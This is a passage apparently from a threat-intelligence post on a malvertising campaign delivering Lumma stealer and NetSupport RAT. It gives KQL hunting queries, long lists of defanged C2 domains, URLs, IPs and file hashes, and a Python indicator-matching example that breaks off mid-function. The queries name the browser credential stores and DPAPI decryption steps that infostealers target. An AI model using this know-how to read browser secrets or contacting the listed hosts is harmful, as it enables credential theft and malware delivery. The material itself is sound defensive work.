let ipAddressToSearch = dynamic(["45.141.84.60", "91.202.233.18", "154.216.20.131", "5.10.250.240", "79.132.128.77"]);
union isfuzzy=true
(
    AzureDiagnostics
    | where identity_claim_ipaddr_s in (ipAddressToSearch) or conditions_sourceIP_s in (ipAddressToSearch) or CallerIPAddress in (ipAddressToSearch) or clientIP_s in (ipAddressToSearch) or clientIp_s in (ipAddressToSearch) or primaryIPv4Address_s in (ipAddressToSearch) or conditions_destinationIP_s in (ipAddressToSearch)
    | project Timestamp = TimeGenerated, Table = "AzureDiagnostics", IPAddress = coalesce(identity_claim_ipaddr_s, conditions_sourceIP_s, CallerIPAddress, clientIP_s, clientIp_s, primaryIPv4Address_s, conditions_destinationIP_s), AdditionalInfo = tostring(AdditionalFields)
),
(
    IdentityQueryEvents
    | where IPAddress in (ipAddressToSearch) or DestinationIPAddress in (ipAddressToSearch)
    | project Timestamp, Table = "IdentityQueryEvents", IPAddress = coalesce(IPAddress, DestinationIPAddress), AdditionalInfo = Query
),
(
    AADSignInEventsBeta
    | where IPAddress in (ipAddressToSearch)
    | project Timestamp, Table = "AADSignInEventsBeta", IPAddress, AdditionalInfo = UserAgent
),
(
    Heartbeat
    | where ComputerIP in (ipAddressToSearch)
    | project Timestamp = TimeGenerated, Table = "Heartbeat", IPAddress = ComputerIP, AdditionalInfo = OSName
),
(
    CloudAppEvents
    | where IPAddress in (ipAddressToSearch)
    | project Timestamp, Table = "CloudAppEvents", IPAddress, AdditionalInfo = UserAgent
),
(
    DeviceNetworkEvents
    | where LocalIP in (ipAddressToSearch) or RemoteIP in (ipAddressToSearch)
    | project Timestamp, Table = "DeviceNetworkEvents", IPAddress = coalesce(LocalIP, RemoteIP), AdditionalInfo = InitiatingProcessCommandLine
),
(
    AADUserRiskEvents
    | where IpAddress in (ipAddressToSearch)
    | project Timestamp = TimeGenerated, Table = "AADUserRiskEvents", IPAddress = IpAddress, AdditionalInfo = RiskEventType
),
(
    AADNonInteractiveUserSignInLogs
    | where IPAddress in (ipAddressToSearch)
    | project Timestamp = TimeGenerated, Table = "AADNonInteractiveUserSignInLogs", IPAddress, AdditionalInfo = UserAgent
),
(
    MicrosoftAzureBastionAuditLogs
    | where TargetVMIPAddress in (ipAddressToSearch) or ClientIpAddress in (ipAddressToSearch)
    | project Timestamp = TimeGenerated, Table = "MicrosoftAzureBastionAuditLogs", IPAddress = coalesce(TargetVMIPAddress, ClientIpAddress), AdditionalInfo = UserAgent
)
| sort by Timestamp desc

Browser remote debugging

Identify AutoIT scripts launching Chromium-based browsers (such as chrome.exe, msedge.exe, brave.exe) in remote debugging mode.

DeviceProcessEvents
| where InitiatingProcessVersionInfoInternalFileName == "AutoIt3.exe" // Check for "AutoIt" scripts, even if it's renamed.
| where ProcessCommandLine has "--remote-debugging-port" // Identify Chromium based browsers (chrome.exe, msedge.exe, brave.exe etc) being launched in remote debugging mode.
| project DeviceId, Timestamp, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessFolderPath, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine

DPAPI decryption via AutoIT

Identify DPAPI decryption activity originating from AutoIT scripts.

DeviceEvents
| where ActionType == "DpapiAccessed"
| where InitiatingProcessVersionInfoInternalFileName == "AutoIt3.exe"
| where (AdditionalFields has_any("Google Chrome", "Microsoft Edge") and AdditionalFields has_any("SPCryptUnprotect"))
| extend json = parse_json(AdditionalFields)
| extend dataDesp = tostring(json.DataDescription.PropertyValue)
| extend opType = tostring(json.OperationType.PropertyValue)
| where (dataDesp in~ ("Google Chrome", "Microsoft Edge") and opType =~ "SPCryptUnprotect")
| project Timestamp, ReportId, DeviceId, ActionType, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, AdditionalFields, dataDesp, opType

DPAPI decryption via LOLBAS binaries

Identify DPAPI decryption activity originating from LOLBAS binaries (RegAsm.exe and MSBuild.exe).

DeviceEvents
| where ActionType == "DpapiAccessed"
| where InitiatingProcessFileName has_any ("RegAsm.exe", "MSBuild.exe")
| where (AdditionalFields has_any("Google Chrome", "Microsoft Edge") and AdditionalFields has_any("SPCryptUnprotect"))
| extend json = parse_json(AdditionalFields)
| extend dataDesp = tostring(json.DataDescription.PropertyValue)
| extend opType = tostring(json.OperationType.PropertyValue)
| where (dataDesp in~ ("Google Chrome", "Microsoft Edge") and opType =~ "SPCryptUnprotect")
| project Timestamp, ReportId, DeviceId, ActionType, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, AdditionalFields, dataDesp, opType

Sensitive browser file access via AutoIT

Identify AutoIT scripts (renamed or otherwise) accessing sensitive browser files.

let browserDirs = pack_array(@"\Google\Chrome\User Data\", @"\Microsoft\Edge\User Data\", @"\Mozilla\Firefox\Profiles\");
let browserSensitiveFiles = pack_array("Web Data", "Login Data", "key4.db", "formhistory.sqlite", "cookies.sqlite", "logins.json", "places.sqlite", "cert9.db");
DeviceEvents
| where AdditionalFields has_any ("FileOpenSource") // Filter for "File Open" events.
| where InitiatingProcessVersionInfoInternalFileName == "AutoIt3.exe"
| where (AdditionalFields has_any(browserDirs) or AdditionalFields has_any(browserSensitiveFiles))
| extend json = parse_json(AdditionalFields)
| extend File_Name = tostring(json.FileName.PropertyValue)
| where (File_Name has_any (browserDirs) and File_Name has_any (browserSensitiveFiles))
| project Timestamp, ReportId, DeviceId, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, File_Name

Sensitive browser file access via LOLBAS binaries

Identify LOLBAS binaries (RegAsm.exe and MSBuild.exe) accessing sensitive browser files.

let browserDirs = pack_array(@"\Google\Chrome\User Data\", @"\Microsoft\Edge\User Data\", @"\Mozilla\Firefox\Profiles\");
let browserSensitiveFiles = pack_array("Web Data", "Login Data", "key4.db", "formhistory.sqlite", "cookies.sqlite", "logins.json", "places.sqlite", "cert9.db");
DeviceEvents
| where AdditionalFields has_any ("FileOpenSource") // Filter for "File Open" events.
| where InitiatingProcessFileName has_any ("RegAsm.exe", "MSBuild.exe")
| where (AdditionalFields has_any(browserDirs) or AdditionalFields has_any(browserSensitiveFiles))
| extend json = parse_json(AdditionalFields)
| extend File_Name = tostring(json.FileName.PropertyValue)
| where (File_Name has_any (browserDirs) and File_Name has_any (browserSensitiveFiles))
| project Timestamp, ReportId, DeviceId, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, File_Name

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Indicators of compromise

Streaming website domains with malicious iframe

Indicator | Type
movies7[.]net | Domain
0123movie[.]art | Domain

Malicious iframe redirector domains

  • fle-rvd0i9o8-moo[.]com (Domain)
  • 0cbcq8mu[.]com (Domain)

Malvertisement distributor

  • widiaoexhe[.]top (Domain)

Malvertising website domains

  • widiaoexhe[.]top (Domain)
  • predictivdisplay[.]com (Domain)
  • buzzonclick[.]com (Domain)
  • pulseadnetwork[.]com (Domain)
  • onclickalgo[.]com (Domain)
  • liveadexchanger[.]com (Domain)
  • greatdexchange[.]com (Domain)
  • dexpredict[.]com (Domain)
  • onclickperformance[.]com (Domain)

GitHub referral URLs

  • hxxps://pmpdm[.]com/webcheck35/ (URL)
  • hxxps://startherehosting[.]net/todaypage/ (URL)
  • hxxps://kassalias[.]com/pageagain/ (URL)
  • hxxps://sacpools[.]com/pratespage/ (URL)
  • hxxps://dreamstorycards[.]com/amzpage/ (URL)
  • hxxps://primetimeessentials[.]com/newpagyes/ (URL)
  • hxxps://razorskigrips[.]com/perfect/ (URL)
  • hxxps://lakeplacidluxuryhomes[.]com/webpage37 (URL)
  • hxxps://ageless-skincare[.]com/gn/ (URL)
  • hxxps://clarebrownmusic[.]com/goodday/ (URL)
  • hxxps://razorskigrips[.]com/gn/ (URL)
  • hxxps://compass-point-yachts[.]com/nicepage77/pro77.php (URL)
  • hxxps://razorskigrips[.]com/goodk/ (URL)
  • hxxps://lilharts[.]com/propage6/ (URL)
  • hxxps://enricoborino[.]com/propage66/ (URL)
  • hxxps://afterpm[.]com/pricedpage/ (URL)
  • hxxps://eaholloway[.]com/updatepage333/ (URL)
  • hxxps://physicaltherapytustin[.]com/webhtml/ (URL)
  • hxxps://physicaltherapytustin[.]com/web-X/ (URL)
  • hxxps://razorskigrips[.]com/newnewpage/ (URL)
  • hxxps://statsace[.]com/web_us/ (URL)
  • hxxps://nationpains[.]com/safeweb3/ (URL)
  • hxxps://vjav[.]com/ (URL)
  • hxxps://thegay[.]com/ (URL)
  • hxxps://olopruy[.]com/ (URL)
  • hxxps://desi-porn[.]tube/ (URL)
  • hxxps://cumpaicizewoa[.]net/partitial/ (URL)
  • hxxps://ak.ptailadsol[.]net/partitial/ (URL)
  • hxxps://egrowz[.]com/webview/ (URL)
  • hxxps://or-ipo[.]com/nice/ (URL)

GitHub URLs

  • hxxps://github[.]com/down4up/ (URL)
  • hxxps://github[.]com/g1lsetup/iln77 (URL)
  • hxxps://github[.]com/g1lsetup/v2025 (URL)
  • hxxps://github[.]com/git2312now/DownNew152/ (URL)
  • hxxps://github[.]com/muhammadshahblis/ (URL)
  • hxxps://github[.]com/Jimelecar (URL)
  • hxxps://github[.]com/kloserw (URL)
  • hxxps://github[.]com/kopersparan/ (URL)
  • hxxps://github[.]com/zotokilowa (URL)
  • hxxps://github[.]com/colvfile/bmx84542 (URL)
  • hxxps://github[.]com/colvfile/yesyes333 (URL)
  • hxxps://github[.]com/mp3andmovies/ (URL)
  • hxxps://github[.]com/anatfile/newl (URL)
  • hxxps://github[.]com/downloadprov/www (URL)
  • hxxps://github[.]com/abdfilesup/readyyes (URL)
  • hxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/898537481 (URL)
  • hxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/898072392/ (URL)
  • hxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/902107140 (URL)
  • hxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/902405338 (URL)
  • hxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/901430321/ (URL)
  • hxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/903047306/ (URL)
  • hxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/899121225 (URL)
  • hxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/899472962/ (URL)
  • hxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/900979287/ (URL)
  • hxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/901553970 (URL)
  • hxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/901617842/ (URL)
  • hxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/897657726 (URL)
  • hxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/903499100/ (URL)
  • hxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/903509708/ (URL)
  • hxxps://objects.githubusercontent[.]com/github-production-release-asset-2e65be/915668132/ (URL)

DropBox URL

  • hxxps://uc8ce1a0cf2efa109cd4540c0c22.dl.dropboxusercontent[.]com/cd/0/get/CgHUWBzFWtX1ZE6CwwKXVb1EvW4tnDYYhbX8Iqj70VZ5e2uwYlkAq6V-xQcjX0NMjbOJrN3_FjuanOjW66WdjPHNw2ptSNdXZi4Sey6511OjeNGuzMwxtagHQe5qFOFpY2xyt1sWeMfLwwHkvGGFzcKY/file?dl=1# (URL)

Discord URL

  • hxxps://cdn.discordapp[.]com/attachments/1316109420995809283/1316112071376769165/NativeApp_G4QLIQRa.exe (URL)

First stage GitHub-hosted payloads

Filename: SHA-256

  • NanoPhanoTool.exe: cd207b81505f13d46d94b08fb5130ddae52bd1748856e6b474688e590933a718
  • Squarel_JhZjXa.exe: b87ff3da811a598c284997222e0b5a9b60b7f79206f8d795781db7b2abd41439
  • PriceApp_1jth1MMk.exe: ef2d8f433a896575442c13614157261b32dd4b2a1210aca3be601d301feb1fef
  • Paranoide.exe: 5550ea265b105b843f6b094979bfa0d04e1ee2d1607b2e0d210cd0dea8aab942
  • AliasApp.exe: 0c2d5b2a88a703df4392e060a7fb8f06085ca3e88b0552f7a6a9d9ef8afdda03
  • X-essentiApp.exe: d8ae7fbb8db3b027a832be6f1acc44c7f5aebfdcb306cd297f7c30f1594d9c45
  • QilawatProtone.exe: 823d37f852a655088bb4a81d2f3a8bfd18ea4f31e7117e5713aeb9e0443ccd99
  • ElectronApp.exe: 588071382ac2bbff6608c5e7f380c8f85cdd9e6df172c5edbdfdb42eb74367dc
  • NativeApp_dRRgoZqi.exe: dd8ce4a2fdf4af4d3fc4df88ac867efb49276acdcacaecb0c91e99110477dbf2
  • NativeApp_G5L1NHZZ.exe: 380920dfcdec5d7704ad1af1ce35feba7c3af1b68ffa4588b734647f28eeabb7
  • NativeApp_86hwwNjq.exe: 96cc7c9fc7ffbda89c920b2920327a62a09f8cb4fcf400bbfb02de82cdd8dba1
  • NativeApp_01C02RhQ.exe: 800c5cd5ec75d552f00d0aca42bdade317f12aa797103b9357d44962e8bcd37a
  • App_aeIGCY3g.exe: afdc1a1e1e934f18be28465315704a12b2cd43c186fbee94f7464392849a5ad0
  • Pictore.exe: de6fcdf58b22a51d26eacb0e2c992d9a894c1894b3c8d70f4db80044dacb7430
  • ScenarioIT.exe: f677be06af71f81c93b173bdcb0488db637d91f0d614df644ebed94bf48e6541
  • CiscoProton.exe: 7b88f805ed46f4bfc3aa58ef94d980ff57f6c09b86c14afa750fc41d32b7ada8
  • Alarmer.exe: dc8e5cae55181833fa9f3dd0f9af37a2112620fd47b22e2fd9b4a1b05c68620f
  • AevellaAi.2.exe: 3e8ef8ab691f2d5b820aa7ac805044e5c945d8adcfc51ee79d875e169f925455
  • avs.exe: d2e9362ae88a795e6652d65b9ae89d8ff5bdebbfec8692b8358aa182bc8ce7a4
  • mrg.exe: 113290aaa5c0b0793d50de6819f2b2eead5e321e9300d91b9a36d62ba8e5bbc1
  • mrg.exe: 732b4874ac1a1d4326fc1d71d16910fce2835ceb87e76ad4ef2e40b1e948a6cc
  • Application.exe: aea0892bf9a533d75256212b4f6eaede2c4c9e47f0725fc3c61730ccfba25ec8
  • Application.exe: ea2e21d0c09662a0f9b42d95ce706b5ed26634f20b9b5027ec681635a4072453
  • SalmonSamurai.exe: 83679dfd6331a0a0d829c0f3aed5112b69a7024ff1ceebf7179ba5c2b4d21fc5
  • Arendada.exe: 47ef2b7e8f35167fab1ecdd5ddb73d41e40e6a126f4da7540c1c0394195cb3df
  • Arduino.exe: 92d457b286fb63d2f5ec9413fd234643448c5f8d2c0763e43ed5cf27ab47eb02
  • SecondS.exe: 9d5c551f076449af0dbd7e05e1c2e439d6f6335b3dd07a8fa1b819c250327f39
  • ultraedit.msi: 0e20bea91c3b70259a7b6eef3bff614ce9b6df25e078bc470bfef9489c9c76e6

First-stage Dropbox-hosted payload

Filename: SHA-256

  • App_File-x38.3.exe: c0bc1227bdc56fa601c1c5c0527a100d7c251966e40b2a5fa89b39a2197dda67

First-stage Discord-hosted payload

Filename: SHA-256

  • NativeApp_G4QLIQRa.exe: 87200e8b43a6707cd66fc240d2c9e9da7f3ed03c8507adf7c1cfe56ba1a9c57d

Certificate signatures of GitHub-hosted payloads

  • c855f7541e50c98a5ae09f840fa06badb97ab46c
  • 94c21e6384f2ffb72bd856c1c40b788f314b5298
  • 74df2582af3780d81a8071e260c2b04259efc35a
  • 07728484b1bb8702a87c6e5a154e0d690af2ff38
  • 901f3fe4e599cd155132ce2b6bf3c5f6d1e0387c
  • be7156bd07dd7f72521fae4a3d6f46c48dd2ce9e
  • 686b7ebba606303b5085633fcaa0685272b4d9b9
  • 74a8215a54f52f792d351d66bd56a0ac626474fb
  • 561620a3f0bf4fb96898a99252b85b00c468e5af
  • 8137f599ac036b0eaae9486158e40e90ebdbce94
  • E9007755cfe5643d18618786de1995914098307f

Certificate signature of Dropbox-hosted payload

  • fa6146f1fdad58b8db08411c459cb70acf82846d

Second-stage payloads

File name: SHA-256

  • NanoTool.exe: 9f958b85dc42ac6301fe1abfd4b11316b637c0b8c0bf627c9b141699dc18e885
  • Squarel.exe: 29539039c19995d788f24329ebb960eaf5d86b1f8df76272284d08a63a034d42
  • ParanoidResolver.exe: 1f73a00b5a7ac31ffc89abbedef17ee2281cf065423a3644787f6c622295ff29
  • AliasInstall.exe: 997671c13bb78a9acc658e2c3a1abf06aedc4f1f4f1e5fd8d469a912fc93993b
  • IoNixNginx.exe: 1d8ab53874b2edfb058dd64da8a61d92c8a8e302cc737155e0d718dbe169ba36
  • QilawatProton.exe: 885f8a704f1b3aaa2c4ddf7eab779d87ecb1290853697a1e6fb6341c4f825968
  • ProtonEditor.exe: 48f422bf2b878d142f376713a543d113e9f964f6761d15d4149a4d71441739e5
  • AlEditor.exe: 9daa63046978d7097ea20bfbb543d82374cf44ba37f966b87488f63daf20999e
  • Scielfic.exe: 6ec86b4e200144084e07407200a5294985054bdaddb3d6c56358fc0657e48157
  • Pictore.exe: 18959833da3df8d5d8d19c3fce496c55aa70140824d3a942fe43d547b9a8c065
  • AlarmWalker Solid.exe: 552f23590bdf301f481e62a9ce3c279bab887d64f4ba3ea3d81a348e3eff6c45
  • Aevella.exe: 2a738f41b42f47b64be7dc2d16a4068472b860318537b5076814891a7d00b3bb
  • Application.exe: 5b50d0d67db361da72af2af20763b0dde9e5e86b792676acb9750f32221e955c
  • ArchiverApp.exe: cfeac95017edbfe9a0ad8f24e7539f54482012d11dc79b7b6f41ff4ff742d9c6
  • LakerBaker.exe: af7454ca632dead16a36da583fb89f640f70df702163f5a22ba663e985f80d88
  • NanoTool.exe: efdcd37ee0845e0145084c2a10432e61b1b4bf6b44ecd41d61a54b10e3563650
  • DisplayPhotoViewer.exe: 86ae0078776c0411504cf97f4369512013306fcf568cc1dc7a07e180dde08eda
  • CheryLady Application.exe: 773d3cb5edef063fb5084efcd8d9d7ac7624b271f94706d4598df058a89f77fd
  • SalmonSamurai.exe: 40abba1e7da7b3eaad08a6e3be381a9fc2ab01b59638912029bc9a4aa1e0c7a7
  • Heaveen Application.exe: 39dbf19d5c642d48632bfaf2f83518cfbd2b197018642ea1f2eb3d81897cf17d
  • Cisco Application.exe: 234971ecd1bf152c903841fac81bdaa288954a2757a73193174cde02fa6f937b
  • Simplify.exe: 221615de3d66e528494901fb5bd1725ecda336af33fe758426295f659141b931
  • SecondS.tmp: 5185f953be3d0842416d679582b233fdc886301441e920cb9d11642b3779d153

Second-stage C2s

  • 159.100.18[.]192 (C2)
  • 192.142.10[.]246 (C2)
  • 79.133.46[.]35 (C2)
  • 84.200.24[.]191 (C2)
  • 84.200.24[.]26 (C2)
  • 89.187.28[.]253 (C2)
  • 185.92.181[.]1 (C2)
  • 188.245.94[.]250 (C2)

Third-stage payloads: .exe and PowerShell files

File name: SHA-256

  • ApproachAllan.exe: 4e5fafffb633319060190a098b9ea156ec0243eb1279d78d27551e507d937947
  • DiscoConvicted.exe: 008aed5e3528e2c09605af26b3cda88419efb29b85ed122cab59913c18f7dc75
  • AwesomeTrader.exe: 21d4252a6492270f24282f8de9e985c9b8c61412f42d169ff4b128fd689d4753
  • CiteLips.exe: c9713c06526673bf18dbdaf46ea61ca9dd8fefe8ceec3be06c63db17e01e3741
  • RepublicChoir.exe: f649f66116a3351b60aa914e0b1944c2181485b1cf251fc9c1f6dab8a9db426b
  • 6Zh7MvxYtHTBFX90Mn.exe: b96360d48c2755ded301dd017b37dfdce921bdea7731c4b31958d945c8a0b8f5
  • ExclusivePottery.exe: 54c8a4f58b548c0cf6dbea2522e258723263ccde11d23e48985bdd1fd3535ce2
  • squarel.ps1: d70ccae7914fc8c36c9e11b2a7f10bebd7f5696e78d8836554f4990b0f688dbb
  • MadCountries.exe: 9fe2c00641ece18898267b3c6e4ee0cb82ffefbc270c0767c441c3f38b63a12a
  • HockeyTract.exe: f136fa82ff73271708afe744f4e6a19cd5039e08ecd3ddad8e4d238f338f4d58
  • BruneiPlugins.exe: 453de65c9cc2dc62a67c502cd8bc26968acad9a671c1e095312c1fa6db4a7c74
  • CnnCylinder.exe: a76548a500d81dbb6f50419784a9b0323f5e42245ac7067af2adee0558167116
  • specreal.ps1: d70ccae7914fc8c36c9e11b2a7f10bebd7f5696e78d8836554f4990b0f688dbb
  • InflationWinston.exe: dfbba64219fc63815db538ae8b51e07ec7132f4b39ba4a556c64bd3a5f024c2d
  • netsup.ps1: d70ccae7914fc8c36c9e11b2a7f10bebd7f5696e78d8836554f4990b0f688dbb
  • CfUltra.exe: 7880714c47260dba1fd4a4e4598e365b2a5ed0ad17718d8d192d28cf75660584
  • CalvinShoppercom.exe: 345a898d5eab800b7b7cbd455135c5474c5f0a9c366df3beb110f225ba734519
  • EscortUnavailable.exe: 258efd913cccdb70273c9410070f093337d5574b74c683c1cdff33baff9ffd7c
  • DisagreeProceed.exe: 9c82a2190930ec778688779a5ad52537d8b0856c8142c71631b308f1f8f0e772
  • BarbieBiblical.exe: 34f43bfc0a6f0d0f70b6eee0fa29c6dc62596ab2b867bbabd27c68153ea47f24
  • MysqlManaging.exe: ef1f9d507a137a4112ac92c576fc44796403eb53d71fe2ddb00376419c8a604e
  • PillsHarvest.exe: 4af3898ba3cf8b420ea1e6c5ce7cdca7775a4c9b78f67b493a9c73465432f1d3
  • BelfastProt.exe: ad470bffbd120fc3a6c2c2e52af3c12f9f0153e76fee5e2b489a3d1870bdff03
  • HowardLikelihood.exe: cc08892ace9ac746623b9d0178cd4d149f6a9ab10467fb9059d16f2c0038dcf9
  • SorryRequiring.exe: 4a2346d453b2ac894b67625640347c15e74e3091a9aa15629c3a808caaff1b2b
  • SearchMed.exe: b0aab51b5e4a9cdd5b3d2785e4dea1ec06b20bc00e4015ccd79e0ba395a20fbd
  • RepublicChoir.exe: f649f66116a3351b60aa914e0b1944c2181485b1cf251fc9c1f6dab8a9db426b
  • DesignersCrawford.exe: e8452a65a452abdb4b2e629f767a038e0792e6e2393fb91bf17b27a0ce28c936
  • HumanitarianProvinces.exe: 25cfd6e6a9544990093566d5ea9d7205a60599bfda8c0f4d59fca31e58a7640b
  • ResetEngaging.exe: 51fbc196175f4fb9f38d843ee53710cde943e5caf1b0552624c7b65e6c231f7e
  • EducationalDerby.exe: 4a9a8c46ff96e4f066f51ff7e64b1c459967e0cdeb74b6de02cf1033e31c1c7b
  • StringsGrill.exe: f2a8840778484a56f1215f0fa8f6e8b0fb805fce99e62c01ff0a1f541f1d6808
  • CongressionalMechanics.exe: 2060509a63180c2f5075faf88ce7079c48903070c1c6b09fa3f9d6db05b8d9da
  • SexuallyWheat.exe: d39075915708d012f12b7410cd63e19434d630b2b7dbe60bd72ce003cd2efeaf
  • PerceptionCircuits.exe: 0e7dd3aa100d9e22d367cb995879ac4916cb4feb1c6085e06139e02cc7270bba
  • WWv63SKrHflebBd4VW.ps1: 483796a64f004a684a7bc20c1ddd5c671b41a808bc77634112e1703052666a64
  • WritingsShanghai.exe: fa131ea3ce9a9456e1d37065c7f7385ce98ffa329936b5fdd0fd0e78ade88ecb
  • IUService.exe: d5a6714ab95caa92ef1a712465a44c1827122b971bdb28ffa33221e07651d6f7
  • RttHlp.exe: 8aed681ad8d660257c10d2f0e85ae673184055a341901643f27afc38e5ef8473
  • ASmartService.exe: 75712824b916c1dc8978f65c060340dc69b1efa0145dddbf54299689b9f4a118
  • ClaireSpecifically.exe: 746abef4bde48da9f9bff3c23dd6edf8f1bea4b568df2a7d369cb30536ec9ce0
  • report.exe: 6daccc09f5f843b1fa4adde64ad282511f591a641cb474e123fed922167df6ae
  • xh6yIa7PXFCsasc0H5.exe: 5f17501193f5f823f419329bc20534461a7195aa4c456e27af6b0df5b0788041
  • yL6Iwcawoz3KDjg60m.exe: 5ecb4240fae36893973fb306c52c7e548308ebcfba6d101aad4e083407968a96
  • CustomsCampbell.exe: 5b80c7d65bb655ccb6e3264f4459a968edcda28084e0ddde16698f642b2d7d83
  • HoldemRover.exe: 4c60cdd1ee4045eb0b3bfda8326802d17565f3d1ff6829ac05775ebc6d9ca2dc
  • QUCvpZLobnhvno5v1t.exe: 4bac608722756c80c29fee6f73949c011ea78243e5267e86b7b20b3beeb79f9e
  • EmilyHaiti.exe: 3221f1356a91d4f06d1deee988be04597cc11bc1cab199ba9c43b9d80dfa88bd
  • PIPIPOO.exe: 15bf7a141a5a5e7e5c19ffbfbb5b781ae8db52d9ba5ffeb1364964580ed55b13
  • ReliefOrganizational.exe: 02533f92d522d47b9d630375633803dd8d6b4723e87d914cd29460d404134a66
  • HelloWorld.ps1: 670218cfc5c16d06762b6bc74cda4902087d812e72c52d6b9077c4c416485251
  • .zip: 0997201124780f11a16662a0d718b1a3ef3202c5153191f93511d7ecd0de4d8d
  • 251.exe: 4b50e7fba5e33bac30b98494361d5ab725022c38271b3eb89b9c4aab457dca78

Fourth-stage AutoIT, NetSupport RAT, PowerShell, and Lumma

File name(s): SHA-256

  • Korea.com, Fabric.com, Affiliated.com, Weeks.com, Briefly.com, Denmark.com, Tanzania.com, Cookies.com, Spice.com, SophieHub.scr, SpaceWarp.scr, SkillSync.scr, Quantify.scr, HealthPulse, CogniFlow.scr, ArgonautGuard.scr: 865347471135bb5459ad0e647e75a14ad91424b6f13a5c05d9ecd9183a8a1cf4
  • Warrant.com, Ford.com, AutoIt3.exe, Seq.com, Underwear.com: 1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49
  • Presentationhost.exe: 18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d
  • erLX7UsT.ps1: 2a29c9904d1860ea3177da7553c8b1bf1944566e5bc1e71340d9e0ff079f0bd3
  • 675aff18abddc.exe: adf5a9c2db09a782b3080fc011d45eb6eb597d8b475c3c27755992b1d7796e91
  • 675aff18abddc.vbs: 5f2b66cf3370323f5be9d7ed8a0597bffea8cc1f76cd96ebb5a8a9da3a1bdc71
  • 251.exe: 707a23dcd031c4b4969a021bc259186ca6fd4046d6b7b1aaffc90ba40b2a603b

Third-stage C2s

  • hxxp://keikochio[.]com/staz/gribs.zip (C2)
  • hxxp://keikochio[.]com/incall.php?=compName=<computer name> (C2)
  • hxxps://stocktemplates[.]net/input.php?compName=<computer name> (C2)
  • hxxp://89.23.96[.]126/?v=3&event=ready&url=hxxp://188.245.94[.]250:443/auto/28cd7492facfd54e11d48e52398aefa7/251.exe (C2)

Fourth-stage C2s

  • 45.141.84[.]60 (IP address)
  • 91.202.233[.]18 (IP address)
  • 154.216.20[.]131 (IP address)
  • 5.10.250[.]240 (IP address)
  • 79.132.128[.]77 (IP address)
  • hxxps://shortlearn[.]click (URL)
  • hxxps://wrathful-jammy[.]cyou (URL)
  • hxxps://mycomp[.]cyou (URL)
  • hxxps://kefuguy[.]shop (URL)
  • hxxps://lumdukekiy[.]shop (URL)
  • hxxps://lumquvonee[.]shop (URL)
  • hxxps://klipcatepiu0[.]shop (URL)
  • hxxps://gostrm[.]shop (URL)
  • hxxps://ukuhost[.]net (URL)
  • hxxps://silversky[.]club (URL)
  • hxxps://pub.culture-quest[.]shop (URL)
  • hxxps://se-blurry[.]biz (URL)
  • hxxps://zinc-sneark[.]biz (URL)
  • hxxps://dwell-exclaim[.]biz (URL)
  • hxxps://formy-spill[.]biz (URL)
  • hxxps://covery-mover[.]biz (URL)
  • hxxps://dare-curbys[.]biz (URL)
  • hxxps://impend-differ[.]biz (URL)
  • hxxps://dreasd[.]xyz (URL)
  • hxxps://ikores[.]sbs (URL)
  • hxxps://violettru[.]click (URL)
  • hxxps://marshal-zhukov[.]com (URL)
  • hxxps://tailyoveriw[.]my (URL)
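The Sentinel TI Mapping analytics described earlier in this post match the indicators published here against workspace data. As an added example that is not part of the Microsoft post, the Python below performs that matching offline: it refangs a handful of the indicators listed in this section and the ones before it (hxxp to http, [.] to a dot), reduces IP, domain and URL indicators to a single host key, and checks constructed DNS and proxy log lines against them, treating subdomains of a listed domain as hits. The log lines, their key=value layout, and the client addresses are constructed.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# A few indicators copied from the lists in this post, still defanged.
SAMPLE_INDICATORS = [
    "159.100.18[.]192",                       # second-stage C2
    "188.245.94[.]250",                       # second-stage C2
    "hxxp://keikochio[.]com/staz/gribs.zip",  # third-stage C2 URL
    "hxxps://lumdukekiy[.]shop",              # fourth-stage C2
    "hxxps://marshal-zhukov[.]com",           # fourth-stage C2
    "widiaoexhe[.]top",                       # malvertisement distributor
]

# Constructed log lines in a simple key=value format (not real telemetry).
SAMPLE_LOG_LINES = [
    "2025-03-01T10:00:01Z dns client=10.0.0.5 query=lumdukekiy.shop type=A",
    "2025-03-01T10:00:02Z dns client=10.0.0.5 query=www.microsoft.com type=A",
    "2025-03-01T10:00:05Z proxy client=10.0.0.5 dst=188.245.94.250:443 "
    "url=http://188.245.94.250:443/auto/28cd7492facfd54e11d48e52398aefa7/251.exe",
    "2025-03-01T10:01:00Z dns client=10.0.0.7 query=cdn.keikochio.com type=A",
    "2025-03-01T10:01:30Z proxy client=10.0.0.7 dst=203.0.113.10:443 url=https://example.com/",
]

TOKEN = re.compile(r"(\w+)=(\S+)")


def refang(indicator):
    """Undo the defanging used in the IoC lists: hxxp(s) -> http(s), [.] -> '.'."""
    text = indicator.strip()
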